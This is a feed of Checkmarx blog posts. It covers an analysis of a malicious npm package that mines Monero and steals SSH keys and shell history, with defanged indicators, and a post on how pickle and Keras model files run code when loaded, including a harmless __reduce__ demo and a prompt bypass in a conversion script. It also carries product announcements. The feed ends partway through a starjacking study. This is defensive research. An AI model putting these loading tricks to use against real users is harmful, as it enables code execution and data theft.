Dozens of Machines Infected: Year-Long NPM Supply Chain Attack Combines Crypto Mining and Data Theft
https://checkmarx.com/blog/dozens-of-machines-infected-year-long-npm-supply-chain-attack-combines-crypto-mining-and-data-theft/ | Mon, 25 Nov 2024 12:00:44 +0000

Through our continuous monitoring of software supply chain threats, the Checkmarx Research team identified a supply chain attack that has remained active for over a year. The package, @0xengine/xmlrpc, began its life as a “legitimate” XML-RPC implementation in October 2023, strategically transformed into a malicious tool in later versions, and has remained active through November 2024. This discovery serves as a stark reminder that a package’s longevity and consistent maintenance history do not guarantee its safety. Whether a package is malicious from the start or a legitimate one becomes compromised through updates, the software supply chain requires constant vigilance – both during initial vetting and throughout a package’s lifecycle.

Key Findings

  • A malicious NPM package masquerading as an XML-RPC implementation has maintained an unusually long presence on the NPM registry from October 2023 to November 2024, receiving 16 updates during this period.
  • The package started as a “legitimate” XML-RPC implementation and strategically introduced malicious code in later versions.
  • The malware steals sensitive data (SSH keys, bash history, etc.) every 12 hours while mining cryptocurrency on infected systems. Data is exfiltrated through Dropbox and file.io.
  • The attack achieved distribution through multiple vectors: direct NPM installation and as a hidden dependency in a legitimate-looking repository.
  • Evasion techniques include detecting system monitoring tools and mining only while the user is inactive.
  • At the time of investigation, it appeared that up to 68 compromised systems were actively mining cryptocurrency through the attacker’s Monero wallet.

Package History and Evolution

The malicious package “@0xengine/xmlrpc” first appeared on the NPM registry on October 2nd, 2023, presenting itself as a pure JavaScript XML-RPC server and client implementation for Node.js.

malicious package “@0xengine/xmlrpc” screenshot in NPM registry

What makes this package particularly interesting is its strategic evolution from legitimate to malicious code. The initial release (version 1.3.2) and its immediate follow-up appeared to be legitimate implementations of XML-RPC functionality. However, starting from version 1.3.4, the package underwent a significant transformation with the introduction of heavily obfuscated malicious code within the “validator.js” file.

Part of the obfuscated code

Over its year-long presence on NPM, the package has received 16 updates, with the latest version (1.3.18) published on October 4th, 2024. This consistent update pattern helped maintain an appearance of legitimate maintenance while concealing the malicious functionality.

Distribution Strategy

Our research uncovered a calculated supply chain attack involving two distribution vectors. The first involves direct installation of @0xengine/xmlrpc from NPM. The second, more sophisticated approach, involves a GitHub repository named “yawpp” (hxxps[:]//github[.]com/hpc20235/yawpp), which presents itself as a WordPress posting tool.

The yawpp repository appears legitimate, offering functionality for WordPress credential checking and content posting. It requires @0xengine/xmlrpc as a dependency, claiming to use it for XML-RPC communication with WordPress sites. This dependency is automatically installed when users set up the yawpp tool through standard npm installation.

This strategy is particularly effective as it exploits the trust developers place in package dependencies, potentially leading to inadvertent installation of the malicious package through what appears to be a legitimate project dependency.

The combination of regular updates, seemingly legitimate functionality, and strategic dependency placement has contributed to the package’s unusual longevity in the NPM ecosystem, far exceeding the typical lifespan of malicious packages that are often detected and removed within days.

Attack Flow

attack flow diagram

The attack orchestrated through @0xengine/xmlrpc operates through a sophisticated multi-stage approach that combines cryptocurrency mining with data exfiltration capabilities. The malicious functionality, concealed within validator.js, remains dormant until executed through one of two vectors:

  • Direct users of the package execute any command with the ‘--targets’ or ‘-t’ flag. This activation occurs when running the package’s validator functionality, which masquerades as an XML-RPC parameter validation feature.
  • Users installing the “yawpp” WordPress tool from GitHub automatically receive the malicious package as a dependency. The malware activates when running either of yawpp’s main scripts (checker.js or poster.js), as both require the ‘--targets’ parameter for normal operation.

This implementation ensures the malware activates through legitimate-looking tool usage, making detection more difficult.

Initial Compromise

Once triggered, the malware begins gathering system information:

Deobfuscated version of the system information gathering code

Following the initial data collection phase, the malware deploys its cryptocurrency mining component with a particular focus on Linux systems. The deployment process involves downloading additional payloads from a Codeberg repository disguised as system authentication services. The mining operation utilizes XMRig to mine Monero cryptocurrency, directing all mining rewards to a predetermined wallet address while connecting to the mining pool.

Deobfuscated configuration revealing the attacker’s Codeberg repository URLs used to fetch mining components

These downloaded components include:

  • XMRig: The actual cryptocurrency mining software
  • xprintidle: Used to detect user activity
  • Xsession.sh: The main script that orchestrates the mining operation

The mining operation is configured with specific parameters targeting Monero:

Monero mining configuration found in the downloaded Xsession.sh script

At the time of our investigation, we observed 68 miners actively connected to this wallet address through the hashvault.pro mining pool, indicating a potentially significant number of compromised systems actively mining cryptocurrency for the attacker.

Monero mining Pool page screenshot

Sophisticated Evasion Mechanisms

The malware implements an advanced process monitoring system to avoid detection. It maintains a list of monitoring tools and continuously checks for their presence.

Deobfuscated version of the process monitoring evasion logic found in Xsession.sh – checks for and terminates mining when system monitoring tools are detected

The malware also carefully monitors user activity through the xprintidle utility. It only initiates mining operations after a specified period of inactivity (default: 1 minute) and immediately suspends operations when user activity is detected. This behavior is controlled by the INACTIVITY_IN_MINS parameter.

INACTIVITY_IN_MINS parameter code

Maintaining Persistence

To ensure long-term survival on infected systems, the malware establishes persistence through systemd, disguising itself as a legitimate session authentication service named “Xsession.auth”. This service is configured to automatically start with the system, ensuring the mining operation resumes after system reboots. The malware also implements a daily check-in mechanism, regularly sending system status updates and potentially receiving new commands or configurations.
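
As a quick illustration of how a defender might check for this particular persistence mechanism, the sketch below asks systemd whether a unit matching the name described above is registered. The unit name comes from this article’s findings; the script itself is a hypothetical triage helper, not part of the malware or of any Checkmarx product.

import subprocess

# Hypothetical triage sketch: query systemd for a unit named after the
# "Xsession.auth" service reported in this research.
SUSPECT_UNIT = "Xsession.auth.service"

result = subprocess.run(
    ["systemctl", "list-unit-files", SUSPECT_UNIT],
    capture_output=True, text=True, check=False,
)
if SUSPECT_UNIT in result.stdout:
    print(f"[!] Suspicious unit registered: {SUSPECT_UNIT} - inspect it before removal")
else:
    print("No matching systemd unit found")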

Deobfuscated systemd service configuration from Xsession.sh used for maintaining persistence

Data Exfiltration Pipeline

The malware implements a comprehensive data collection and exfiltration system that operates continuously. Every 12 hours, it performs a systematic collection of sensitive system information through a “daily_tasks” function found in Xsession.sh:

"daily_tasks" function found in Xsession.sh

During each collection cycle, the malware systematically gathers a wide range of sensitive data including:

  • SSH keys and configurations from ~/.ssh
  • Command history from ~/.bash_history
  • System information and configurations
  • Environment variables and user data
  • Network and IP information through ipinfo.io

The stolen data is exfiltrated through two channels. The first uses the Dropbox API with hardcoded credentials.

const dropboxConfig code snippet

Additionally, the malware employs file.io as a secondary exfiltration channel, using a bearer token for authentication and setting automatic file deletion after download to minimize detection risks.

const token code execution

Conclusion

This year-long campaign serves as a stark reminder of the critical importance of thoroughly vetting open-source projects before incorporation into any software development process. Projects can be malicious from the start, maintaining a long-term presence while hiding their true nature, or legitimate projects can later become compromised and introduce malicious code through updates.

This dual threat emphasizes why developers and organizations must remain vigilant not only during initial vetting but also in monitoring package updates, implementing robust security measures, and conducting regular audits of their dependencies to mitigate the risks associated with supply chain attacks.

As part of the Checkmarx Supply Chain Security solution, our research team continuously monitors suspicious activities in the open-source software ecosystem. We track and flag “signals” that may indicate foul play, including suspicious entry points, and promptly alert our customers to help protect them from potential threats.

Checkmarx One customers are protected from this attack.

Packages

  • @0xengine/xmlrpc

IOC

  • hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xprintidle
  • hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/xmrig
  • hxxps[:]//codeberg[.]org/k0rn66/xmrdropper/raw/branch/master/Xsession.sh
  • Wallet Address: 45J3v3ooxT335ENFjJBB3s7WS7xGekEKiBW4Z6sRSTUa5Kbn8fbqwgC47SLUDdKsri7haj7PBi5Wvf3xLmrX9CEZ3MGEVJU

Tailoring Queries: Azure Open AI and Checkmarx in Action
https://checkmarx.com/blog/tailoring-queries-azure-open-ai-and-checkmarx-in-action/ | Mon, 25 Nov 2024 08:03:36 +0000

Last year we launched AI Query Builder for SAST. It’s now improved and it’s even more secure.

Introducing Enhanced Security and Customization with Azure OpenAI

We are excited to announce that AI Query Builder is now integrated with Azure OpenAI.

This update provides our customers with Microsoft Azure’s top-tier security capabilities while also enabling the use of OpenAI’s advanced models. Our new infrastructure ensures that the code snippet is routed through a managed Checkmarx gateway to a secure and supported AI system.

This is truly the best of both worlds. 

Why Azure OpenAI?

By using Azure OpenAI, users get the following benefits:

  • Security: Azure OpenAI leverages Microsoft Azure’s security features, ensuring a fortified environment for AI-powered applications. It also ensures network isolation and robust security measures, safeguarding sensitive data and maintaining high standards of data protection. The Azure OpenAI Service is fully controlled by Microsoft: Microsoft hosts the OpenAI models in its Azure environment, and the Service does NOT interact with any services operated by OpenAI (e.g., ChatGPT or the OpenAI API). Customer data is therefore not used to improve OpenAI models or any Microsoft or third-party products and services.
  • Enterprise focus: Specifically tailored for business needs, it offers advanced conversational AI capabilities to facilitate more efficient and effective interactions. 

What are the benefits of its integration with Checkmarx? 

  • Managed security gateway: All AI queries are routed through a managed Checkmarx gateway before connecting to Azure OpenAI. This extra layer of security also enables future services and model updates.
  • Future security services: This new setup paves the way for additional security services, ensuring our customers benefit from new services and advancements.
  • Seamless access to AI benefits: The integration allows for seamless access to AI model changes without compromising on security.

Checkmarx AI Query Builder: Making Custom Queries Accessible

The Checkmarx AI Query Builder for SAST enables users to harness AI to automatically generate new custom queries or modify existing ones. This simplifies the process of tailoring the SAST solution to specific application needs.  

“AI Query Builder builds on the custom query capability, allowing AI to help any AppSec team write new or edit existing custom queries. This allows every organization to tune SAST more easily for your applications, increasing accuracy and minimizing false positives and false negatives. AI Query Builder is an expert in the ins and outs of CxQL. You no longer need to be an expert in building a query when an AI can do the work for you! With this feature, a simple prompt such as, “Help me generate a Checkmarx query that will detect an authentication issue,” will immediately generate a new custom query.”  

The AI Query Builder has also gotten a UI refresh, along with the rest of the Query Editor and the Checkmarx One platform, further improving the user experience. 

Why use AI to write queries? 

  • Enhanced efficiency: Saves time and effort by allowing developers to generate tailored queries quickly, reducing the manual workload involved in query development. 
  • Start now: CxQL is a proprietary query language. While it’s easy to learn, by using AI, developers can get started immediately without taking the time to learn a new language. 
  • User-friendly: This tool enables all Checkmarx One users to fine-tune their SAST solution without needing expert query writing knowledge. Simply provide a prompt and the AI will generate a custom query tailored specifically to your needs.

Get Started Today

Still not on Checkmarx One? Contact us to discuss how to get Checkmarx One and take advantage of AI Query Builder today. 

Introducing the Checkmarx One Query Editor
https://checkmarx.com/blog/introducing-the-checkmarx-one-query-editor/ | Mon, 25 Nov 2024 08:03:34 +0000

Accuracy and Flexibility in SAST

One of the big challenges of Static Application Security Testing (SAST) has long been accuracy.  All SAST solutions struggle with accuracy, generating either false positives (unfounded alerts) or false negatives (missed vulnerabilities). This will always be a concern, so choosing the best SAST solution boils down to measuring accuracy.  

At Checkmarx, our SAST tools improve accuracy. Our SAST solution uses queries to facilitate search customization and to provide an adaptive scanning engine, real-time scanning, AI tools, and auto-remediation.

What Are Queries and Why Are They Important?

Queries are the secret sauce of SAST scans. What exactly is a query? A query is a vulnerability rule.  All SAST engines use queries to find vulnerabilities and achieve greater fidelity. 

“Queries are building blocks for identifying potential vulnerabilities and critical for filtering through the noise to avoid sending false positives and false negatives to your developers. Understanding queries enables AppSec teams and developers to prioritize your efforts, and promptly address the most critical issues.”   

However, most SAST solutions don’t let you customize the rules or modify queries. In those cases, users are chained to the vulnerabilities that the solution chooses to look for. The lack of customization leads to more false positives or missed vulnerabilities.

Checkmarx SAST is the only solution that provides the flexibility to customize queries, resulting in lower false positives without creating false negatives for more accurate results. 

“Checkmarx SAST includes pre-built queries (and presets) written in the Checkmarx Query Language (CxQL). These identify common security issues such as SQL injection, cross-site scripting, and insecure access controls, providing an easier way to start securing applications out of the box.” 

See how queries work. 

Tailored Presets & Custom Queries

Checkmarx SAST empowers you to customize queries according to your specific needs. As we described in a previous post:

A common use case that neatly highlights the benefits of customizing queries can be found in cross-site scripting (XSS) vulnerability findings where a false positive may be occurring due to the use of an in-house sanitizer method that is not included in the Checkmarx One default out-of-the-box query. We can simply add this method to the appropriate CxQL query and rescan the project to remove the FP. 

Introducing the Improved Checkmarx Query Editor

Long-time Checkmarx users are probably familiar with CxAudit, our query editor for CxSAST. Our updated Checkmarx Query Editor brings CxAudit features that were previously missing into Checkmarx One! Built with customer experience in mind, this powerful tool is designed to make query editing even easier.

What’s New

Our updated Query Editor focuses on enhancing usability and improving workflow efficiency. Here’s a closer look at what’s new: 

  • Friendly and intuitive user interface – We’ve revamped the look and feel of the Query Editor, making it easier to navigate, understand, and use. The design is modular, allowing users to customize their workspace to suit their needs. You can focus on specific elements or get a broader view of your project. This flexibility ensures that you can work in a way that’s most comfortable for you.
  • Language-specific query view (Edit mode) – Navigating through projects to find specific queries can be time-consuming. That’s why we’ve introduced a language-specific view. Now, you can select a programming language and instantly access all queries related to that language across all projects. This eliminates the need to search through each project individually, saving you valuable time. 
  • Hide empty queries – To further streamline your workflow, we’ve added a new mode that hides empty queries. This removes any queries that didn’t return results, helping to declutter your workspace and letting you concentrate on the queries that need your attention.
  • Scan history – Understanding the history of your scans is crucial for tracking progress. Our new scan history feature provides a comprehensive log of past scans. You can easily review past scans, compare results, and identify patterns that inform future decisions.  

How to Access and Use It

Query Editor is accessible and seamlessly integrated into Checkmarx One. Simply navigate to the queries section and start! You can open the Query Editor associated with a project or open it independently of any project. Get the full documentation here.

Get Started Today

The new Checkmarx One Query Editor simplifies the process of customizing security scans. With an intuitive interface and features like language-specific views and scan history, it helps you prioritize your focus. By reducing false positives and negatives, the Query Editor helps you complete your work and secure your applications more efficiently. Start using the Checkmarx Query Editor today and enhance your application security with ease and precision.

Still not on Checkmarx One? Contact us to discuss how to migrate from CxSAST or another vendor to Checkmarx One today.

“Free Hugs” – What to be Wary of in Hugging Face – Part 2
https://checkmarx.com/blog/free-hugs-what-to-be-wary-of-in-hugging-face-part-2/ | Thu, 21 Nov 2024 12:00:48 +0000

Enjoy Threat Modeling? Try Threats in Models!


Previously… 
In part 1 of this 4-part blog, we discussed Hugging Face, the potentially dangerous trust relationship between Hugging Face users and the ReadMe file, how users who trust the ReadMe can be exploited, and gave a glimpse into methods of attacking users via malicious models.
In part 2, we explore dangerous model protocols in more depth – going into the technical reasons why exactly models end up running code.

Angry pickle


Introduction to Model Serialization  

A model is a program that was trained on vast datasets to either recognize or generate content based on statistical conclusions derived from those datasets.  
To oversimplify, they’re just the data results of statistics. However, do not be misled – models are code, not plain data. This point is often stressed throughout ML, particularly in the context of security. Without going into too much detail – many models inherently require logic and functionality that is custom or specific, rather than just statistical data.
Historically (and unfortunately) that requirement for writable and transmittable logic encouraged ML developers to use complex object serialization as a means of model storage – in this case types of serialization which could pack code. The quickest solution to this problem is the notoriously dangerous pickle, used by PyTorch to store entire Torch objects, or its more contextual and less volatile cousin marshal, used by TensorFlow’s lambda layer to store lambda code. 

Pickle code snippet

Please stop using this protocol for things. Please. 

While simple serialization involves data (numbers, strings, bytes, structs), more complex serialization can contain objects, functions and even code – and that significantly raises the risk of something malicious lurking inside the models.
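
The screenshots in this post aren’t reproduced here, so here is a minimal, self-contained sketch of the underlying pattern: pickle’s __reduce__ hook lets a serialized object dictate a callable to run during deserialization. The payload below is a harmless print, but it could just as easily be os.system.

import pickle

# Minimal sketch of why pickle is dangerous: __reduce__ tells the unpickler
# which callable to invoke (and with which arguments) while loading.
class NotJustData:
    def __reduce__(self):
        return (print, ("this ran during pickle.loads()",))

blob = pickle.dumps(NotJustData())
pickle.loads(blob)  # prints the message - deserialization alone executed a call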

Browser warning on Pickle module

Writing’s on the wall there, guys

Protecting these dangerous deserializers while still using them is quite a task. For now, let’s focus on exploitation. This is quite well documented at this point, though there have been some curious downgrades exposed during this research. 
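
Before moving on to exploitation, one generic mitigation is worth sketching: Python’s own documentation suggests restricting which globals an unpickler may resolve. This is a general-purpose pattern (not how PyTorch or Hugging Face implement their protections internally), and the allowlist below is just an example – shown only to illustrate what “protecting the deserializer” can look like.

import io
import pickle

# Restricted unpickler sketch: only an explicit allowlist of globals may be
# resolved, so a payload pointing at os.system or subprocess.Popen is refused.
ALLOWED = {("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()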

Exploiting PyTorch 

PyTorch is a popular machine learning library – extremely popular on Hugging Face and the backbone of many ML frameworks supported on HF. We’ll have more on those (and how to exploit them) in a future blog.
PyTorch relies on pickling to save its output, so a saved object can contain an arbitrary method with arbitrary arguments that is invoked upon deserialization with the load function; the same pattern applies to PyTorch’s torch.load:

import torch code snippet

If this looks identical to the previous Pickle example to you then that’s because it is. 

Note that the source code for BadTorch doesn’t need to be in scope – the value of __reduce__ is packed into the pickle, and its contents will execute on any pickle.load action. 
To combat this, PyTorch added a weights_only flag. This flag treats anything outside of a very small allowlist as malicious and rejects it, severely limiting if not blocking exploitation. It is used internally by Hugging Face’s transformers, which explains why transformers can safely load torch files even when they are dangerous. Starting with version 2.4, this flag is encouraged via a warning stating that in the future it will become the default behavior.

Hugging Face transformers warning text

At the time of writing, PyTorch does not yet enable weights_only mode by default. Seeing how rampant the use of torch.load is in various technologies (this will be discussed in part 3), it would be safer to believe this change when we see it, because it is likely to be a breaking change. It would then be up to the maintainers whose code this change breaks to either adapt to it or disable this security feature.
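
For code that has to consume untrusted checkpoints today, the flag can simply be passed explicitly. A minimal sketch, assuming a checkpoint file at a hypothetical path:

import torch

# Load an untrusted checkpoint with the restricted unpickler: only tensors and
# a small set of primitive containers are accepted, so a pickled __reduce__
# payload fails to load instead of executing.
state_dict = torch.load("downloaded_model.pt", map_location="cpu", weights_only=True)
print(type(state_dict))  # typically a dict mapping parameter names to tensors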

TensorFlow to Code Execution 

TensorFlow is another machine learning library that offers various ways to serialize objects as well.
Of particular interest to us are serialized TensorFlow objects in protocols that may contain serialized lambda code. Since lambdas are code, they get executed after being unmarshaled by Keras, the high-level interface library for TensorFlow.
Newer versions of TensorFlow no longer generate files in the older Keras formats (the TF1 format, which uses several protobuf files, or h5).
To observe this, we can look at the older TensorFlow 2.15.0, which allows generating a model that executes malicious code when loaded (credit to Splinter0 for this particular exploit):

import tensorflow code snippet

Note that the functionality to serialize lambdas has been removed in later versions of the protocol. Keras, which supports Lambdas, now relies on annotations to link lambdas to your own code, removing arbitrary code from the process.
This could have been a great change if it eliminated support for the old dangerous formats, but it does not – it only removes serialization (which creates the payload) but not execution after deserialization (which consumes it). 
Simply put – just see for yourself: if you generate a payload like the above model in an h5 format using the dangerous tensorflow 2.15.0, and then update your tensorflow: 

import tensorflow code snippet

Exploit created on tensorflow 2.15.0, exploit pops like a champ on 2.18.0

In other words – this is still exploitable. It’s not really a Keras vulnerability (in the same vein that torch.load “isn’t vulnerable”), though, but rather a matter of how you end up using it – we’ve disclosed it amongst several other things to Hugging Face in August 2024, but more on that in a later write-up.
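
A practical consequence is that legacy h5 files can be triaged before they are ever loaded. The sketch below assumes a legacy Keras HDF5 model file at a hypothetical path and relies on the fact that such files carry their architecture as a JSON “model_config” attribute; the exact layout can vary between Keras versions, so treat this as an illustration rather than a complete scanner.

import json

import h5py

# Inspect a legacy Keras h5 file for Lambda layers without calling load_model().
with h5py.File("suspicious_model.h5", "r") as f:
    config = json.loads(f.attrs["model_config"])

layers = config.get("config", {}).get("layers", [])
lambda_layers = [layer for layer in layers if layer.get("class_name") == "Lambda"]
if lambda_layers:
    print(f"[!] {len(lambda_layers)} Lambda layer(s) found - marshaled code may run on load")
else:
    print("No Lambda layers declared in model_config")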

SafeTensors

Currently, Hugging Face is transitioning models from the pickle format to SafeTensors, which uses a more secure deserialization protocol that is not as naïve (but also not as robust) as pickle.

SafeTensors simply use a completely different language (Rust) and a much simpler serialization protocol (Serde), which requires customization for any sort of automatic behavior post-deserialization.
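
To make the difference concrete, here is a minimal round-trip sketch with the safetensors library (the file name is arbitrary): the format is just a JSON header plus raw tensor buffers, and loading returns a plain dictionary of tensors with nothing to execute.

import torch
from safetensors.torch import load_file, save_file

# Save and reload a trivial set of tensors - no pickled objects involved.
save_file({"weight": torch.zeros((2, 2))}, "weights.safetensors")

tensors = load_file("weights.safetensors")
print(tensors["weight"].shape)  # torch.Size([2, 2])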

Moving from Torch to SafeTensors

However, there is a fly in the SafeTensors ointment – importing. It makes sense that the only way to import from another format is to open it using legacy libraries, but that is also another vulnerable way to invoke torch files. convert.py is part of the SafeTensors library and is intended to convert torch files to the SafeTensors format – however, the conversion itself is simply a wrapper for torch.load:
https://github.com/huggingface/safetensors/blob/main/bindings/python/convert.py#L186
The HF Devs are aware of this and have added a prompt – but that can be bypassed with a -y flag:

python convert code result

Model will run whoami on conversion. Disclaimer: image manipulated to exclude a bunch of passive warnings that might warn you, right after it’s way too late

The problem here is the very low trust barrier to cross – since, as discussed, most configuration is derived from ReadMe commands. This flag can simply be hidden between other values in instructions, which makes convert.py not just a conversion tool but also another vector to look out for.

There are many more conversion scripts in the transformers library that still contain dangerous calls to torch.load and can be found on the Transformers’ Github.

Conclusion

It’s interesting to see how what’s old is new again. Old serialization protocols, which are easier to implement and use, made a comeback during ML experimentation – when security was never a concern – and have become deeply ingrained in this relatively new technology. The price for that speed is still being paid, with the entire ecosystem struggling to pivot to a secure and viable service by slogging through this tech debt.

There are several recommendations to be made when judging models by their format:

  • With serialization mechanisms baked into the ecosystem, you should avoid the legacy ones, and review those that are middle-of-the-way and historically vulnerable.
  • Consider a transition to SafeTensors or other protocols that are identified as secure and do not execute code or functions on deserialization, and reject older, potentially dangerous protocols.
    • BUT never trust conversion tools to safely defuse suspicious models (without reviewing them first).
  • And – as always – make sure you trust the maintainer of the Model.

On The Next Episode…  

Now that we’ve discussed a couple of vulnerable protocols, we’ll demonstrate how they can be exploited in practice against Hugging Face integrated libraries. 

Checkmarx Advances Software Supply Chain Security
https://checkmarx.com/blog/checkmarx-advances-software-supply-chain-security/ | Tue, 19 Nov 2024 16:05:25 +0000

Software supply chain security (SSCS) attacks are on the rise.

In fact, according to Infoworld, “we are in the midst of a rapid surge in software supply chain attacks,” with a staggering 742% annual increase, resulting in costs exceeding $4 million. Gartner predicted that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021.

The growing number of high-profile SSCS attacks and data breaches (such as SolarWinds, NotPetya, CCleaner, Target, Equifax and Kaseya VSA) have increased awareness of SSCS vulnerabilities. This alarming trend emphasizes the need for enterprises to allocate more resources into securing their software development and deployment processes, from code to cloud.

But how did we get here? Fifteen years ago, most enterprises exclusively relied on internally developed code. Today, however, most modern code bases are largely built with open source packages and third-party code. While this shift accelerates development and fosters more innovative code, it also introduces more vulnerabilities – whether from human error, careless exposure of secret keys (passwords, encryption keys, and access tokens), or malicious third-party code. Additionally, the recent uptick in AI-generated code from digital assistants like ChatGPT, GitHub Copilot, and Codestral has further increased the risk of insecure code finding its way into enterprise applications.

Like it or not, modern development requires the use of third-party codebases, despite the risks they may bring. That’s why enterprises need a solution to effectively manage and mitigate the risks associated with these third-party libraries.

AppSec Has Traditionally Focused on Internally Developed Code

Figure 1 – Traditional application security focused only on finding vulnerabilities in proprietary code.

Until recently, application security (AppSec) primarily focused on the code developed by the enterprise in-house. This made it easier to detect and remediate security vulnerabilities, because the code was exclusively written by their own developers. Vulnerability detection for these code bases generally relied on static application security testing (SAST) and dynamic application security testing (DAST).

In fact, when Checkmarx was founded 18 years ago, we also focused on this traditional AppSec model, concentrating on securing the code developed internally by enterprises.

Why Software Supply Chain Security Now? 

What changed? In recent years, the importance of securing the software supply chain from code to cloud has grown steadily among enterprise CISOs, AppSec managers, DevOps teams, and developers.

This shift is driven by four key factors:

  1. Extensive use of open source packages and other third-party code
  2. Migration of applications to the cloud (cloud-native applications)
  3. Incorporation of automated compile/deploy workflows (CI/CD)
  4. Proliferation of attacks on the software supply chain

These changes in modern development have introduced greater risks to software security than ever before. Securing applications now requires involvement from every stage of the software development lifecycle (SDLC), from code to cloud. To address these new threat vectors, Checkmarx developed a comprehensive, integrated solution that protects the entire software supply chain.

SSCS Begins With SCA and Malicious Package Protection

Surveys indicate a dramatic increase in the use of open source libraries, with up to 97% of applications now incorporating open source code. This statistic is not surprising, considering how open source libraries significantly speed up development and reduce business costs.

However, this increased use of open source code has also exposed enterprises to a massive new threat vector: unintentional vulnerabilities and intentionally malicious code, both of which can be exploited.

Checkmarx has adapted to the evolving risks in the software supply chain and has become a leader in addressing these open source risks. How? Our Software Composition Analysis (SCA) solution provides enterprises with a strong protection against these types of malicious packages. Checkmarx’ SCA solution:

  • Comprehensively discovers and itemizes all open source packages used in applications (including transitive open source dependencies)
  • Identifies open source packages containing vulnerable code, malicious code, or suspicious behavior (such as typosquatting, starjacking, and repojacking)
  • Prioritizes remediation efforts using multiple analyses (e.g., reachability/exploitable path analysis and SAST correlation)
  • Provides AppSec teams and developers with specific and actionable remediation guidance
  • Integrates with CI/CD and IDE tools to smoothly integrate security testing and remediation workflows into existing deployment and development platforms
  • Generates an industry-standard software bill of materials (SBOM)
  • Detects legal and compliance risks associated with open source licensing issues
  • Enforces policy rules to automatically send alerts and prevent builds based on a range of factors

Figure 2 – The first step to expanding application security into software supply chain security is adding advanced SCA with malicious package protection.

Checkmarx One: Advanced AppSec Including SSCS

Unfortunately, even advanced SCA solutions are no longer enough to protect against SSCS attacks. To fully protect the software supply chain, Checkmarx now offers a complete suite of industry-leading solutions to secure both internally developed code and the software supply chain components that they consume.

Checkmarx One is a code-to-cloud platform that provides an integrated SSCS solution that no enterprise can afford to be without. In addition to our SAST, DAST, SCA, and malicious package protection capabilities, Checkmarx One covers the entire software supply chain with the following capabilities:

  • Container Security – Identify and mitigate risks in container images, container infrastructure, and runtime code.
  • AI Security – Automatically scan AI-generated source code and referenced open source libraries for vulnerable or malicious code.
  • IaC Security – Secure cloud infrastructure with proactive vulnerability identification and misconfiguration detection.
  • API Security – Discover and remediate every API vulnerability.
  • Secrets Detection – Automatically discover the presence of sensitive credentials.
  • Repository Health – Get comprehensive health scorecards for software repositories.

Figure 3 – Checkmarx One delivers comprehensive code-to-cloud application security, including coverage for critical software supply chain dangers.

More About Our Newest Capabilities

Secrets Detection and Repository Health are the newest additions to the Checkmarx One suite aimed at protecting against software supply chain risks. Let’s take a closer look at these new offerings:

Secrets Detection

Figure 4 – Secrets Detection minimizes risk by identifying sensitive credentials that are at risk of being unintentionally exposed.

Enterprises unintentionally expose thousands of secret credentials in GitHub and other publicly accessible or insecure locations every day. This exposure can enable unauthorized access to your systems, potentially resulting in cyber-attacks, financial loss, and reputational damage. Once credentials are compromised, attackers can move laterally within systems to extract data, deploy malware, or launch further attacks on infrastructure, customers, and partners.

Checkmarx’ Secrets Detection minimizes risk by quickly identifying sensitive credentials that may be unintentionally exposed – and pinpoints which ones are still valid. With this insight, your development and security teams can quickly remediate issues by removing exposed secrets and updating them to prevent any unauthorized usage.

Scanning for exposed secrets can be initiated manually on demand, or automatically via triggers from SCM integration (e.g., pull request, build). Discovered secrets are automatically validated to determine if they are still in effect and thus potentially exploitable.

This provides three key benefits:

  • Minimize supply chain risk by preventing the exposure of secret credentials, reducing the chance of attackers accessing your systems or stealing data.
  • Improve regulatory compliance by meeting data protection requirements (e.g., GDPR, HIPAA, PCI DSS, SOX, FISMA, CCPA) and avoiding fines and reputational damage.
  • Increase developer efficiency by allowing developers to initiate scans, review discovered secrets, and receive remediation guidance directly within their IDE.

Repository Health

Figure 5 – Repository Health provides ongoing visibility into the security and maintenance health of the code repositories used in enterprise applications.

Enterprises also need a reliable way to continuously evaluate the riskiness of the open source code used in their applications, as well as a method to monitor the quality and security of the repositories containing their internally written code.

Checkmarx’ Repository Health maximizes the security posture of your software supply chain by continuously tracking health scores for all repositories in your applications. Scoring is based on more than a dozen key factors in areas such as code quality, dependency management, CI/CD best practices, and project maintenance.

Repository Health can automatically scan repositories upon repository updates, ensuring up-to-date repo health metrics with no manual effort. Developers and security teams can also run on-demand repo health scans at any time via API, CLI, or the Checkmarx One UI.

Additionally, repository health scores are included in Checkmarx One reports, providing visibility into – and efficient prioritization of – security vulnerabilities, code quality issues, and repository health risks, all in one place.

The three key benefits this provides include:

  • Minimize supply chain risk – Visibility into the security health of open source components and your own code repositories that closes an important gap in software supply chain security.
  • Efficient holistic risk prioritization – Identifying and prioritizing high-risk areas across the software supply chain that allows developers and security teams to focus their efforts on the most critical security issues.
  • Enhanced transparency and communication – Clear, quantifiable metrics on the security posture of open source dependencies and first-party repositories that improve transparency and communication among stakeholders.

Learn More

Given the wide range of threat vectors facing enterprise applications and the software supply chain, deploying the most comprehensive and effective security solutions is essential. And these solutions must also cultivate an excellent developer experience to encourage adoption and support seamless, efficient workflows.

Relying on a hodge-podge of different tools to protect your supply chain is no longer viable – it is expensive, inefficient, and difficult to maintain. To protect your enterprise from data breaches or other system infiltrations, you need a unified platform that covers all your bases. And that’s where Checkmarx comes in.

Contact us for a free demo of Checkmarx One and discover the industry’s best solution for securing your enterprise’s applications and the software supply chain.

Falling Stars
https://checkmarx.com/blog/falling-stars/ | Mon, 18 Nov 2024 14:39:23 +0000

Intro

The number of open-source packages is constantly rising, complicating how developers choose a package that fits their needs and is secure. Package repositories offer various metrics to help developers choose the right package, like the number of downloads, GitHub statistics, and user ratings. Nevertheless, popularity continues to be one of the most influential factors in package selection. When we see a popular package, we assume it’s well-maintained and reliable. This common assumption led to the emergence of starjacking two years ago.

Starjacking is a technique that artificially inflates a package’s apparent popularity by exploiting how package repositories display information about associated GitHub repositories. After the technique became public, several major repositories, including npm and Yarn, were found to allow package publications with links to GitHub repositories not owned by the package publisher. We recently conducted comprehensive research across more than 20 package repositories to evaluate the current state of starjacking, and the findings show promising developments in security measures.

Researched package repositories

Our research encompassed 21 separate package repositories, ranging from big ones like npm, Maven, and PyPI to smaller ones like CPAN, LuaRocks, and Hackage. The table below lists each repository included in the research and its primary programming language.

Repo Name             Language
npm                   JS
Maven Central         Java
